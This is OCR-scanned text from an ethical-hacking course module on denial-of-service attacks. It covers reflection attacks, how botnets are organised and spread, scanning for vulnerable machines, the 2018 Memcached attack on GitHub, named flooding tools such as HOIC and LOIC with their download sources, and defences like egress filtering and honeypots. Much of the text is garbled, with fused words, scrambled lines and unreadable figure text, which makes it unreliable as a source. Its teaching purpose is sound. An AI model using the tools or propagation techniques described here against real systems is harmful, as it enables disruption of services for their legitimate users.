system. referring
Consequently, the itin
to the fraudulenthardwareupdate, victim installs
the attackerattains complete controlover the victim'ssystem.
their
Sends
email,
chats,
tweets,
post,IRC
with fraudulentcontent for hardware
videos
updates
ical andCountermensores
Mackin ©by E-Comel
Copyright
DistributedReflectionDenial-of-Service(DRDoS)
Attack
spooted
the
knowna tack,
oles use of
mutile
DistributedReflectionDenial-of-Service(DRDoS)
Attack
A distributedreflectionDoS(DRDoS)
attack,
alsoknownas a “spoofed―
attack,
involvesthe use
of multiple intermediaryand secondary
machinesthat contributeto a DDoSattackagainst a
andCountermensores ©
Mackin by E-Comel
Copyright
Primary
Attacker
Intermediary
Victims
Secondary
Victims
Countermeasures
10.15:
Figure
reflection
[DRDOS)
Distributed Ds attack
>
Turn off the Character Generator Protocol (CHARGEN)
service to stopthis attack
method
© Downloadthe latestupdates
andpatches
for servers
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Botnets
The term “bot― and refersto softwareapplications
is a contraction of “robot― that run
automatedtasksover the Internet.Attackersuse botsto infecta large numberof computers
that forma network, allowing
or “botnet,― them to launchDDoSattacks,generate spam,
spread viruses, andcommit othertypesof crime.
Thissection dealswith organized
cyber-crime organizational
syndicates, charts,
botnets,and
botnetpropagation techniques; scanningmethodsfor finding
botnet ecosystems; vulnerable
machines;
ofmalicious
andthe propagation
code.
ical andCountermensores
Mackin ©by E-Comel
Copyright
CyberCrime: Organizational
Organized Chart
o=ae
Babson fod acon tet
BOG em
@ @
Organized Crime: Organizational
Cyber Chart
Organized CrimeSyndicates
Whilecyber criminalsworkedindependently i n the past,they now tend to operatei n organized
They
‘groups. are increasingly with organized
associated crime syndicatesandtakeadvantage of
the sophisticated techniquesof these syndicates to engagei n illegal activity,usually for
monetary benefit.Thereare organized
groupsof cyber criminalswhowork in a hierarchical set
up with a predefinedrevenue-sharingmodel,whichis a kindof major corporation that offers
services. Organized
criminal groupscreate and rent botnetsandoffervarious
services ranging
fromthe development
of malwareand hacking
of bankaccountsto the deployment of massive
anytargetfora price.
DoSattacksagainst
For example, an organized crime syndicatemightperform a DDoSattackagainst a bank to
divertthe attention of the bank’s team whiletheycleanout bankaccountswith stolen
security
account credentials.The growing involvementof organized criminalsyndicatesi n politically
motivatedcyber warfareandhacktivismis a matter of cancern for nationalsecurity
agencies.
Cybercrime featuresa complicated rangeof players,
andcyber criminalsare paidaccording to
the tasktheyperform theyhold.Theheadof the cybercrime
or the position organization (i.e.,
the boss) acts as a business entrepreneur.The bossdoes not commit any crimes directly
Immediately belowthe bossin theorganizational hierarchy
is the “underboss,―
who sets up a
C&Cserver and crimeware toolkit databaseto manage the implementation of attacksand
provide Trojans. Belowthe underbossare various “campaign managers―with their own
affiliationnetworksfor implementing attacksand stealing
data.Finally,resellerssellthe stolen
ical andCountermensores
Mackin ©by E-Comel
Copyright
Botnets
\@ 80tsare software
repetitive that
applications run automated
webspidering
tass, suchas andsearch
tasksover theinterneta nd
engine Indexing
denialofservicenetwork
|@ Abotnetis a huge
attacks
ofcompromised
by
andcanbeused an attacker
systems to launch
gen.
BO eB) o eSSDa
Sager sh= et vert
Botnets
Botsare usedfor benign datacollectionor data mining activities, spidering,―
suchas “web as
well as to coordinateDoSattacks. Themain purposeof a bot is to collectdata.Thereare
differenttypesof bots,suchas Internet bots,
IRCbots,andchatterbots.Examples for IRCbots
are Supybot,
Sopel,EnergyMech, andEggdrop.
A botnet(acontraction of “roBOT
NETwork")
is @group of computers bybots;
“infected―
however, botnetscan be usedfor both positiveand negative purposes. As a hacking tool,a
botnetis composed of a huge networkof compromised systems. A relativelysmallbotnetof
1,000botshasa combinedbandwidthlarger thanthe bandwidthof most corporate systems.
adventof botnetsled to an enormous increase i n cybercrime.
‘The Botnets formthe core of the
activitycenter that linksand unites various partsof the cybercriminal
cybercriminal world
Cybercriminal
service suppliers
maliciouscode development,
encryptionandpacking.
bulletproofhosting, a
are a partof cybercrime network.They offer services suchas
the creation of browserexploits, and
ical andCountermensores
Mackin ©by E-Comel
Copyright
can use botnetsto perform
Attackers the following:
DDoSattacks:Botnetscan generate DDoSattacks,whichconsume the bandwidthof the
victim'scomputers. Botnets can alsooverloada system,wastingvaluablehost system
resourcesanddestroying networkconnectivity
‘Spamming:
Attackersuse a proxy for spamming. They
SOCKS harvestemailaddresses
fromwebpagesor other sources.
Sniffing
traffic:A packetsnifferobservesthe data trafficenteringa compromised
machine.It allowsan attackerto collect sensitive informationsuchas credit card
numbersand passwords. The snifferalsoallowsan attackerto stealinformation
from
anotherbotnet. In other words,
one botnet and use it against botnetscan rob one
another.
Keylogging:Keylogging is a methodof recording the keys
typedon a keyboard, and it
providessensitive informationsuchas system passwords.Attackersuse keylogging
to
harvestaccount login informationforservices suchas PayPal
Spreading new malware:Botnetscan beusedto spread new bots.
Installing
advertisementadd-ons:Botnets can be usedto perpetrate a “click by
fraud―
automating
clicks.
GoogleAdSenseabuse:Somecompanies permitshowing Google AdSense adson their
websitesfor economic benefits.Botnets allowa n intruderto automate clickson an ad,
producinga percentageincreasein the clickqueue.
Attackson IRCchatnetworks:Alsocalledcloneattacks, theseattacksare similarto a
DDoSattack.
IRCnetwork,
A master
agent
instructseachbotto link to thousands
whichcan floodthe network.
ofclones withinan
‘Manipulating
manipulate
online
onlinepolls polls
andgames: Every
andgames.
botnethasa unique address,
enabling
it to
identity
‘Mass theft: Botnetscan senda large
numberof emailswhile impersonating
a
reputable such as eBay.This technique
organization allows attackersto steal
information
foridentity
theft.
Thebelowfigure illustrateshow an attackerlaunchesa botnet-basedDoSattackon a target
server. Theattackersets up a bot C&Ccenter,following whichthey infecta machine(bot)and
compromises it. Later,theyuse this bot to infectand compromiseother vulnerablesystems
availablei n the network, resulting
i n a botnet.Thebots (also knownas zombies) connect to the
C&Ccenter and awaits instructions. Subsequently, the attackersendsmaliciouscommands to
the botsthrough the C&Ccenter. Finally, as per the attacker'sinstructions,
the botslauncha
DoSattackon a targetserver, making its services unavailable
to legitimateusersi n the network.
ical andCountermensores
Mackin ©by E-Comel
Copyright
o/ 33SS
2,
a
oe
BotnetSetup
A Typical
A Typical
BotnetSetup
Botnet Ecosystem
Figure
20.19:
Botnetecosystem
Methodsfor Finding
Scanning VulnerableMachines
Random
Seanning
“©The
nected machineprobes
ange andchecks
IPaddresses
for vnerabiies
fromthetargetnetwork
randomly
Scanning astpotently
vulnerable
and
Bivtist attacker
‘An fst collects of machines thenscans
fo finduinerable
‘hem machines
information
‘uses obtained
froman infected
m achineto find
new vulnerable
machines
Permutation
a litof tonew
|G tures pseudorandom
permutation IPaddresses
find wuinerable
Methodsfor Finding
Scanning VulnerableMachines
beloware scanning methodsusedbyan attackerto find vulnerablemachinesi n
Discussed a
network:
=
Random
Scanning
In this technique, the infectedmachine(anattacker'smachineor a zombie) probes IP
addresses randomly i n the target network'sIP rangeandcheckstheir vulnerability.
On
finding a vulnerablemachine, it hacksandattemptsto infectthevulnerablemachineby
installing the same maliciouscodeinstalledon it. Thistechnique significant
generates
traffic becausemanycompromised machinesprobe andcheckthe same IPaddresses.
Malwarepropagates quickly andthe speed
i n the initial stage, of propagation
reducesas
of
the number new IPaddresses
Hit-ist Scanning
available decreases
with time.
Through
scanning,an attackerfirstcollectsa listof potentially
vulnerablemachines
and
then creates a zombiearmy. Subsequently, the attacker scans the list to find a
vulnerablemachine.On finding one, the attackerinstallsmaliciouscode on it and
dividesthelisti n half.Theattacker
continuesto scanone half,whereas the other halfis
scannedbythe newly compromisedmachine.Thisprocesskeeps repeating,causingthe
numberof compromised machinesto increase exponentially.
Thistechnique ensures
Topological
Scanning
Thistechniqueuses the information
obtainedfrom an infectedmachineto findnew
vulnerablemachines.An infectedhostchecksfor URLsi n the harddriveof a machine
ical andCountermensores
Mackin ©by E-Comel
Copyright
that it wants to infect.Subsequently,
it shortlists and it checks
URLsand targets, their
vulnerability.
Thistechnique
yields
accurate results,and its performance
is similarto
thatofthehit-listscanningtechnique.
LocalSubnetScanning
In thistechnique,
an infectedmachine
searches
for new vulnerablemachines
i n its local
byusingthe information
network,behinda firewall, hiddeni n the localaddresses.
Attackersuse
Permutation
this
technique
Scanning
i n combination
with otherscanningmechanisms.
ical andCountermensores
Mackin ©by E-Comel
Copyright
HowDoesMaliciousCode Propagate?
‘Attackers
ue thre malicious
to propagate
techniques codeto newly
discovered
vulnerable systems
Ee canst oon
ieee Seve
Eo 25
acte~
Anattacker an atacktoolkt
places on
Ome
8s
tee
eo
EES
stem
‘The
host
attaching tse anes te
Central Source
=
Attacker Figure
20.20Central
source propagstion
NextVictim
ical andCountermensores
Mackin ©by E-Comel
Copyright
Back-chaining
Propagation
In thistechnique, the attackerplaces an attacktoolkit o n their own system, anda copy
of the attacktoolkit is transferredto a newly discoveredvulnerablesystem.Theattack
tools installed on the attacking machineuse some special methodsto accepta
connection fromthe compromised systemandthen transfera file containing the attack
tools to it. Simple portlistenerscontaining a copyof this file or full intruder-installed
web servers, both of which use the TrivialFileTransferProtocol(TFTP), supportthis
back-channel filecopy,
Repeat
Figue10.21:Back-calning
propagation
Propagation
‘Autonomous
Unlikethe previously
discussed in whichan external
mechanisms, file source transfers
the attacktoolkit, the attacking
in autonomous propagation, hostitself transfersthe
attacktoolkitto a newlydiscovered
vulnerable
system,exactly
at the time it breaks
into
that system.
Exploitand
CopyCode
ee a
Attacker Figure
10.22:
Victim
Propagation
Autonomous
Next Victim
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
DDoSCase Study
DDoSattacksare sophisticated and complex attacksbasedon DoSandmultipledistributed
attack sources. In a DDoSattack,a largenumberof compromised computers(zombies)
interruptor suspend networkservices. Thissection presents
a
of DDoSattack
a casestudy
ical andCountermensores
Mackin ©by E-Comel
Copyright
DDoSAttack
Lea
So l ed
| @} &| @~|Google
DDoSAttack
In a DDoSattack,attackersuse a group of compromised systems(botsor zombies)usually
infected to perform
with Trojans a DoSattack or network
on a targetsystem resource.
: —
DE i=
q
Ea
:
@ @--}Google
“oe
«
|fi]
‘As
figure,
attack
shown networking aHigh
i n the an anonymous
10:23DDoS
Figure
hacker hosts
scenario
Orbitlon Cannon(HOIC)DDoSattack
tool o n a web server theyown or on a compromised web server. Thehackerthenadvertises
the
HOICDDoSattacktool on social sites or search enginessuchas Twitter,Facebook
andGoogle with a malicious
downloadlink.
Module0 1226
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
Userswho desireto perform the DDoSattackmaydownloadthe HOICDDoSattacktool by
clicking o n the maliciousdownloadlink provided bythe hacker.Theseusers are termed
“volunteers.―
instructions to proceed
server (e.g., PayPal,
connect anonymous
All the volunteers via an IRCchannel to the hackerandawait
further. Thehackerinstructs the volunteersto flood the targetweb
MasterCard, and PAYBACK) with multiple requests.On receiving
instructions, the volunteers act accordingly. Consequently, the target server becomes
overwhelmed andstopsresponding to requests fromeven legitimateusers.
ical andCountermensores
Mackin ©by E-Comel
Copyright
HackersAdvertise Links for Downloading
Botnets
& warnine!
$1,000 Gift Card
Amazon’
A warnine!
$1,000 GiftCard
Amazon’
2
MAC MalwarewarningAlert
Module0 1228
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
Useof Mobile Devicesas Botnetsfor Launching
DDoSAttacks
unsecured
‘These Android
malware
Nehiyvaneabeto to
d ees are
are rimary tare fr attackersenlarge
becoming theebotnet
becausehey
alious Ano
store
and
eriv-by
downloads
are
aplatonsfoundintheGootlP ly jut few of
examples
Android
festures
T h estacker binds
Unwanted applation
andbefore
malcous
to
ath
themalls
party
appke
the
AK server othe
permissions dtr the
package
package
fl), encryptsandremoves
(APK
store Googe
package
android applications
for infectionmethods.
(APK) file,encrypts it,
andremoves unwantedfeaturesandpermissions beforedistributing the maliciouspackage to a
third-party appstore suchas Google
andinstalling suchapplications, Once
PlayStore. the victims are trickedinto downloading
deviceis takenover bytheattackerandintegrated
thevictim’s
into the attacker'smobilebotnetto perform maliciousactivities suchas DDoSattacksandweb
Injections.
ical andCountermensores
Mackin ©by E-Comel
Copyright
DDoSCaseStudy:
DDoSAttackon GitHub
CEH
ary 2018,Gib encountered
a devastating ODS attack,whichmadets
volumetric service unavalable
to
“©
wort’
largest
Theis
000
the
attack
ever
recorded
Attack
Timeline
February2018
10 The attackm ae Gt com unaviable
of
7a0UTCde tos heeynow ta
at
10T h efist portion
ofthe tack peaked
nghated
over
thousand
diferent
(©T h eattack
umigue autonomous
systems
endpoints across
rom
of
thousands (ASN) tens of
attack
works
(©The
abusing
instances
internet
with of
Memcached
servers
that
areaccessible
onthe
by
puble
enabled
UDPsuppor
nadvertety
byte
senstacker of
1@T h evulnerattyarisingrom this miscnfiguation
used an aplicationfactorof upto51,00,m eaning
tht
foreach bythe upto 1 was sent fowardte target
arpa
(©Wis age asada iow
devastating of Tops
13 datatowardGMb, nterupting
ical andCountermensores
Mackin ©by E-Comel
Copyright
DDoSCaseStudy:
DDoSAttackon GitHub (Cont'd)
Response
‘Gittfub’s
Atoutesrecnvergdinthenest fe
of tant Bendwidth minutes
mikiated
andsca
evesandloadblancer
controlits
atUTE
the attacktthe border
responsecodesinated fall covery 1730
DDoSCaseStudy:
DDoSAttack on GitHub
Source:https://github.blog
GitHubisa renownedopen-source cloud platform usedas a repository bymanycompanies,
businesses,
andresearcherswithwideareas of interest. In February
2018,GitHubencountered
a devastating
DDoSattack,whichmadeits service unavailableto users for 4 min. Thiswas the
world’s
largestDDoSattackever recorded.
=
AttackTimeline
The DDoSattackoccurredon Wednesday, February28,2018.ThisvolumetricDDoS
attack madeGitHub.com unavailable
from 17:21 to 17:26 UTCand intermittently
unavailable
‘At
owing
from17:26to 17:30UTC
17:21UTC, GitHub’s
to a heavy
networkmonitoring
inflowof datapackets.
systemdetectedan anomaly i n the ratio of
andtheynotifiedthe on-callengineerandothers.The below
ingressto egresstraffic,
figure
over
transit
showsinboundversus outboundthroughput links.
-——V
——
10.25:I nbound
Figure versus outbound
throughputaver rani inks
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefirstportionoftheattackpeaked
at 1.35Tbps
via 126.9millionpackets
per second
(pps),
and a second400 Gbps occurreda little after 18:00UTC,Thebelowfigure,
spike
provided
byAkamai,showsinbound
traffici n bitsper second(bps).
‘ALL
BORDER
Bitsper Second
Wed,
28Feb201817:28:00
1387 GwT
Attack Mechanism
Figure
10.26:Inbound
traffic bits
per
second
Thisattackwas an amplification attackusinga Memcached-based approach that peaked
at 1.35Tops.Theattackoriginated fromover a thousanddifferentautonomous system
numbers(ASNs) across tens of thousands of unique endpoints.Theattackworkedby
abusing Memcached instancesthat were inadvertently on the public
accessible Internet
with UDP supportenabled. The spoofing of IP addressesallowed Memcached’s
responsesto betargeted againstanotheraddressand more datathan necessary to be
sent toward the target by the unspoofed source. The vulnerability
due to this
misconfigurationcausedan amplification factorof upto 51,000,
implying
that up to 51
KB was sent toward the target for each bytesent by the attacker.This large
amplificationfactorcausedthe devastating inflow of 1.3 TbpsdatatowardsGitHub,
its normaloperations.
interrupting
+
Response
Github’s
Given the inboundtransit bandwidthto over 100 Gbps
increase in i n one of GitHub’s
facilities,
GitHubpersonnel
decidedto move the incomingtrafficto Akamai.At 17:26
ChatOps
UTC,a commandwas initiated via GitHub’s toolingto withdraw Border
Gateway (BGP)
Protocol
the autonomous system belonging to GitHub,
exclusivelyover GitHub’s and
announcementsover transit providers announce AS36459,
linksto Akamai.
Routes reconvergedi n the next few minutes,and access control lists mitigatedthe
attackat their border.The monitoring
of transit bandwidthlevelsand load balancer
exchanges
GitHub’s
were withdrawnas a follow-up
network
at
responsecodesindicateda full recovery 17:30 UTC.At 17:34 UTC, routes to Internet
to shiftan additional40 Gbps awayfrom
ical andCountermensores
Mackin ©by E-Comel
Copyright
iia
eee dg
Figure
After this incident,
versus
20.27Inbound outbound
throughput
over rast inks
GitHub revealedthat theywere investigating the use of their
monitoring infrastructure
to automate DDoSmitigation providers
andwouldcontinue to
measure response times to similarincidentswith a goal
of reducing
the mean time to
recovery(MTTR)
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
DoS/DDoSAttack Tools
attacktools usedto take over a single
Thissection dealswith various DoS/DDoS or multiple
network systemto exhausttheir computing
resources or renderthem unavailableto their
intended
u sers.
ical
Mackin
and ©by CountermensoresCopyright
E-Comel
DoS/DDoSAttackTools
Cannan(OIE)
ofaerupting
Intention
the
DoS/DDoSAttackTools
+
HighOrbitlon Cannon(HOIC)
Source:https://sourceforge.net
HOICis a networkstressandDoS/DDoS attackapplicationwritten i n BASIClanguage.
It
is designed
requests
follows:
to attackup to 256targetURLS
to a computer
simultaneously.
that uses lulz-inspired
It sendsHTTPPOST
GUIs. Its featuresare summarized asand
GET
©.
High-speed flooding
multi-threadedHTTP
©
Simultaneous
flooding
websites ofup to 256
systemto allowthe deployment
Built-inscripting whichare scripts
of “boosters,―
designed to thwartDDoScountermeasuresandincrease DoSoutput
Portability
to Linux/Macwith a few bugfixes
Ability
Ability throttle
of with
to selectthe number threads i n an ongoingattack
to three
attacksindividually
settings: LOW,
MEDIUM,
andHIGH
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
10.28%
Screenshot
ofHOIC
Ds attacktool
=
LowOrbitlon Cannon(LOIC)
Source:https://sourceforge.net
LOICis a networkstresstestingandDoSattackapplication.
LOICattacks
c an be called
application-based theyprimarily
DOSattacksbecause targetwebapplications.
LOICcan
beusedon a targetsite to floodthe server with TCP packets,
UDP packets,
or HTTP
withthe intention of disrupting
requests the service.
10.10.10.13
10.2: Screenshot
Figure ofLOIC
DoS
ata
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
are some oftheadditional
DoS/DDoS
attacktools
=
XOIC(http://anonhacktivism.blogspot.com)
=
HULK(https://siberianlaika.ru)
=
Hammer (https://sourceforge.net)
Tor’s
=
(https://aithub.com)
Slowloris
(hetps://sourceforge.net)
PyLoris
(https://sourceforge.net)
R-U-Dead-Yet
Module1 0Page
1227 tical MakingandCountermensores
by
Copyright©
Comet
DoSand DDoSAttack Toolsfor Mobiles
10.30:
Figure Screenshot
of LOIC
09Sattacktoo
for
maile
Module0 1238
Page tical MakingandCountermensores
by
Copyright©
Comet
‘AnDosid
Source:https://andosid.droidinformer.org
allowsthe attackerto simulatea DoSattack(anHTTPPOST
AnDOSid flood attackto be
precise)
andDDoSattackon a webserver frommobilephones.
BHO 73600
[05
10.2: Screenshot
Figure ofPackets
Generator
ical
toolformobile
andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Countermeasures
D0S/DDoS is one of the foremost securitythreatson the Internet;thus,there is a great
necessity for solutionsto mitigatetheseattacks.Thissection discussesdetectionmethods,
various preventivemeasures,andresponses to DoS/DD0S attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
DetectionTechniques
Aotivity
Profiling Sequential
ChangePointDetection
|| Based
tignal
Wavelet Analyse
DetectionTechniques
Early helppreventDoS/DDoS
detectiontechniques a D0S/DDoS
attacks.Detecting attackis a
tricky
task.A DoS/DDOSattacktrafficdetectorneedsto distinguish
betweena genuineanda
bogus
data packet,
whichis not always Therefore,
possible. the techniques
employed
for this
purposeare not perfect.
legitimate
Thereis alwaysa chance
networkuser andtrafficgenerated
of confusion
by aDoS/DDoS
between
traffic
generated
attack.Detectiontechniques
bya
are
One problem
in filtering
bogus
traffic from legitimate
traffic is the volumeof traffic. It is
impossible datapacket
to scan each to ensure
All the detectiontechniques
security
froma DoS/DD0S
attack.
used todaydefinean attack as an abnormaland noticeable
Thesetechniques
deviation i n network traffic statistics and characteristics. involve the
statistical
analysis
Thefollowing
to
ofdeviations categorize malicious
are thethreetypesof detectiontechniques:
andgenuinetraffic.
=
ActivityProfiling
Activityprofiling
is performed basedon the averagepacket rate for networkflow,which
consists of consecutive packets with similarpacket headerinformation. The packet
headerinformationincludesthe IP addresses of the destinationand sender, and
ports,
transport protocols used.An attackis indicated
by
‘An levelsamongthe networkflowclusters
increasein activity
©. An increase in
of
theoverallnumber distinct clusters(DDoS
attack)
ical andCountermensores
Mackin ©by E-Comel
Copyright
For a higher
averagepacket
rate or activitylevel of a flow,the time between
consecutive matching
packets
is lower. Randomness i n the average packet
rate or
activitylevelcan indicate suspiciousactivity.Theentropycalculation
methodmeasures
randomness i n activitylevels.If a network is under attack,
the entropyof network
levels
activity increases.
Oneof the majorhurdlesin the activityprofiling methodis the huge volumeof traffic.
Thisproblem can be overcome byclustering packet flowswith similarcharacteristics.
Because DoSattacksgenerate a large numberof data packets that are very similar,an
increase i n the averagepacket rate or an increase i n the diversityof packetscould
indicate a DoSattack
unfamiliar
indicates
network
activity.
frequency suspicious
network signal
‘A consistsof a time-localizeddata packetflow signal and background
noise. Wavelet-basedsignal analysis
filtersout the inputsignals of anomalous
traffic
flow from backgroundnoise. Normalnetworktraffic is generally low-frequency
traffic
During the high-frequency
an attack,
of
components a signal increase.
ical andCountermensores
Mackin ©by E-Comel
Copyright
DoS/DDoSCountermeasureStrategies
Requires
preplanning
andaddtionalresources
to maintainfunctionality
dentiyeel services whilestopping
Mhutting
Down
| downattack
Shutting
has
Down 6 shut allservices
uni the subsided
‘DoS/DDoS
CountermeasureStrategies
=
Absorbingthe Attack: In this strategy, additionalcapacity is usedto absorban attack,
whichrequirespreplanning. It alsorequires additionalresources. One disadvantage
associated
with this strategy is the cost of additionalresources,whichis incurredeven
whenno attacksa re underway.
ical andCountermensores
Mackin ©by E-Comel
Copyright
DDoSAttackCountermeasures
@dettect Attacks
@ Miigateattacks
@ Post-attackForensics
DDoSAttack Countermeasures
Many
solutionshavebeenproposed
for mitigating
the effectsof a DDoSattack.However,
no
single
complete
solutionexiststhat can protectall knownformsof DDoSattacks.
Moreover,
attackerscontinually
devisenew methodsto perform
DDoSattacksto bypass
the security
solutions
employed.
The
following
examples
DD0Scountermeasures:
are
secondaryDeflect
for attack
=
Protect
Neutralize
attacks
victims
attacks
handlers
=
=
Mitigate
=
potential
Prevent attacks =
Post-attackforensics
ical andCountermensores
Mackin ©by E-Comel
Copyright
Protect
Secondary Victims andDetect and NeutralizeHandlers
Secondary
Victims
Protect
ar D005
handlers
(©Thre ey ever deployed
pplication,andscan al leseceved
for om onder pee render
builtin
naraware
andregulary
rope configure
andsoftware
the
update
defense mechanisms inthe
of systems
core
Spooted
Source
Address
ProtectSecondary
Victims
IndividualUsers
Thebestmethodto preventDDoSattacksis for secondary victim systems to prevent
themselves fromtakingpartin the attack,Thisdemands intensifiedsecurity
awareness
and prevention techniques.
Secondary regularly
victims must monitor their security to
remain protected fromDDoSagentsoftware. It must beensuredthat the system does
not installany DDoS agentprogram; further, DDoSagenttrafficmust not betransferred
into thenetwork.
Antivirusand anti-Trojan softwaremust beinstalledand updated regularly, as well as
softwarepatches to fix knownvulnerabilities.Moreover, awareness of security issues
andprevention techniques must be increasedamongall Internet users. It is important
to disableunnecessaryservices,uninstallunusedapplications, andscan all filesreceived
fromexternalsources. Becausethesetasksmayappeardaunting to the averageweb
user, the core hardwareand softwareof computing systems c ome with integrated
mechanisms that defendagainstmaliciouscodeinsertion. Therefore, the built-in
defensivemechanisms i n the core hardwareand softwareof the systems m ust be
properly configured and regularly updatedto avoidDDoS
countermeasureswill leaveattackerswith no DDoS
can launchDDoSattacks.
attacks.
attacknetworkthrough the
Employingabove
whichthey
NetworkServiceProviders.
Serviceprovidersand networkadministratorscan adoptdynamic pricing for their
network usageto charge secondary
potential victims for accessing
the Internet and
ical andCountermensores
Mackin ©by E-Comel
Copyright
thereby
encouragethem to becomemore active in preventingthemselvesfrom
becoming
a partof a DDoS
attack.
DetectandNeutralize Handlers
‘An
importantmethodusedto stopDDoSattacksis to detectandneutralizehandlers.Thiscan
be achievedbynetworktrafficanalysis,
neutralizing and identifying
botnethandlers, spoofed
source addresses. DDoSattack-toolarsenal,
In the agent-handler the handlerworksas an
intermediary
for the attackerto initiate attacks.Analyzing
communication protocols
andtraffic
patternsbetweenhandlersandclientsor handlersand agentscan revealthe networknodes
infectedbythe handlers.Discovering the handlersi n the networkand disabling
themcan be a
quick methodof disrupting the DDoSattacknetwork,Because the numberof DD0Shandlers
deployed i n the network is muchlessthan the numberof agents, neutralizing
a few handlers
can possibly rendermultiple agentsuseless,
thereby thwarting DDoSattacks.
Furthermore,
there is a reasonableprobability
that the spoofed
source address
of DDoSattack
packets
will not represent
a valid source addressof the definite sub-network.Identifying
spoofeds ource addresseswill preventDDoSattackswith thoroughcomprehension
of
communication protocols
andtrafficamonghandlers,
clients,
andagents.
ical andCountermensores
Mackin ©by E-Comel
Copyright
PreventPotentialAttacks
theneaser
pactesleneras
peta
ot brevet
Secrest
ure ivvters
ever
rote
tom T e h
TP theratefound
oriound atic
|| seteetc TP
tgussttrngensies
toeunnahatted er pretecsamint
Haven
coniguing
errr eres
the
high
(©Fereduces
Trea
the
©reaows rotor
|| Wee
volume
inbound
eben BO
PreventPotentialAttacks
=
EgressFiltering
Egressfiltering of IP packets
scans the headers leaving a network.If the packets meet
specifications,
theycan beroutedout ofthe sub-networkfromwhichtheyoriginated
Onthe other hand, do not reachthe targeted
the packets addressif they fail to meet
the necessaryspecifications.
Egress filtering
ensures that unauthorizedor malicious
trafficnever leavesthe internalnetwork.
DDoS attacksgenerate spoofed IP addresses. Establishing
protocols to require any
legitimate packetthat leavesa company’s
network to have a source addressi n which
the networkportion matchesthe internalnetworkcan helpmitigate attacks.A properly
developed firewallforthe sub-networkcan filterout manyDDoSpackets with spoofed
IP source addresses.
Ifa.web server is vulnerableto a zero-day
attackknownonlyto the underground
hacker
community,a server can be vulnerableeven after applying all availablepatches.
if the user enablesegressfiltering,
However, theycan save the integrity by
of a system
keeping the server from establishing
limit the effectiveness
can berestrictedto the required thereby
traffic,
a
connection backto the attacker.Thiswouldalso
of manypayloads usedi n common exploits. Outboundexposure
ability
the attacker's
limiting to connect
to other systems
and gain access to tools that can enablefurther access into the
network.
Ingress
Filtering
Ingress
filtering
is a packet
filtering
technique
usedbymany InternetServiceProviders
(ISPs)
to preventthe source addressspoofing ingressfiltering
of Internet traffic.Thus,
ical andCountermensores
Mackin ©by E-Comel
Copyright
can indirectly typesof net abusebymaking
combatseveral Internettraffictraceableto
its true source. It protects flooding
against attacksthat originatefromvalid prefixes
(IP
addresses)
TCPIntercept
and
enables
the be itssource.
originator
to traced to true
is a traffic-filtering
TCPintercept feature i n routers to protectTCPservers from a TCP
SYN-flooding
attack,whichis a kindof DoSattack.In a SYN-flooding theattacker
attack,
sendsa huge
addresses
volumeof requests connect
are
unresolved.Thishuge
reachable,
not to with unreachable
return addresses.
the connections cannot be established
and remain
volumeof unresolvedopenconnections overwhelmsthe server
Asthe
maycause it to deny
‘and Consequently,
service even to valid requests. legitimate
users
maynot beableto connect to a website, accessemail, u sean FTPservice, andso on.
In the TCPintercept mode,a router intercepts the SYNpackets sent byclientsto a
server and matches themwith an extended a ccesslist. If a matchis obtained, then on
behalfof the destinationserver, the interceptsoftwareestablishes a connection with
the client.Similarly,the interceptsoftwarealso establishes a connectionwith the
destination server on behalf of the client. Once the two half connections are
established, the intercept softwarecombinesthem transparently. Thus,the TCP
interceptsoftwarepreventsfake connection attemptsfrom reaching the server by
acting as a mediatorbetweenthe server andclient throughout the connection.
Ratelimiting.
Ratelimitingi s a technique
usedto controlthe rate ofoutbound or inbound trafficof a
networkinterfacecontroller.Thistechnique effectively
reducesthe highvolumeof
inboundtrafficthat causes a DDoSattack.It is especially importantto employ this
techniquein hardwareappliances, i n whichthe techniqueis configuredto limit the rate
of requestson layers 4 and5 ofthe Open Systems Interconnection(SI)model.
ical andCountermensores
Mackin ©by E-Comel
Copyright
DeflectAttacks
DeflectAttacks
Systems also known as honeypots,
set up with limited security, act as enticement for an
revealsthat a honeypot
attacker.Recentresearch can imitate all aspectsof a network,
including its web servers,mailservers, andclients.Honeypots are intentionallyset up with low
security to gaintheattention of DDOS attackersand serve as a means for gaininginformation
about attackers, attacktechniques, andtoolsbystoringa recordof the system activities. DDoS
attackersattractedbya honeypot install handlersor agent codewithin the honeypot. This
avoidscompromising systems that are more sensitive. Honeypots not onlyprotectthe actual
system fromattackersbutalsokeep activities byrecording
trackof detailson the attackers’ the
activityinformation. Consequently, the honeypot owner can keep @record of the handler
and/oragent activity.Users can employ this knowledge to defendagainst any future DDoS
installationattacks.A defense-in-depth approach with InternetProtocol Security (IPSec) can be
usedat differentnetworkpointsto divert suspiciousDoStrafficto severalhoneypots.
‘There of honeypots:
are two differenttypes
=
honeypots
Low-interaction
=
High-interaction
honeypots
example
‘An for high-interaction honeypots is a honeynet. Honeynets form the security
infrastructure; i n other words, theysimulatethe complete layoutof a networkof computers
but are originally intendedfor “capturing―
attacks.Thegoalis to developa networkwhereinall
activities are controlledandtracked.Thisnetwork contains potential victim decoys,and the
networkeven has
real
computers runningrealapplications.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
KFSensor
Source:http://www.keyfocus.net
KFSensor is a Windows-based honeypot intrusion detectionsystem(IDS). It acts as a
honeypot designedto attract and detecthackers and worms bysimulating vulnerable
systemservices and Trojans. Byresponding with a n emulationof a real service,
KFSensor
reveal
of
can thenature an attackwhilemaintaining
the riskof compromise.
systems
Byactingas a decoy
andprovidea higher
total controlandavoiding
server, it can divert attacksfromcritical
levelofinformation than can beachieved usingfirewalls
(NIDS)
alone.
anda networkIDS
1.33;Screenshot
Figure ofSensor
Thefollowing
are examples
foradditional countermeasure (honeypot)
DoS/DD0S tools:
=
(https://github.com)
SSHHiPot
+
Axtillery
(https://github.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacks
Mitigate
Load
Balancing Throttling Drop
Requests
on
crtcal
|| tata
1 tncrease
bandwidth
‘connections
to absorb servers
@Setroutersto
packets
sth lope
access server
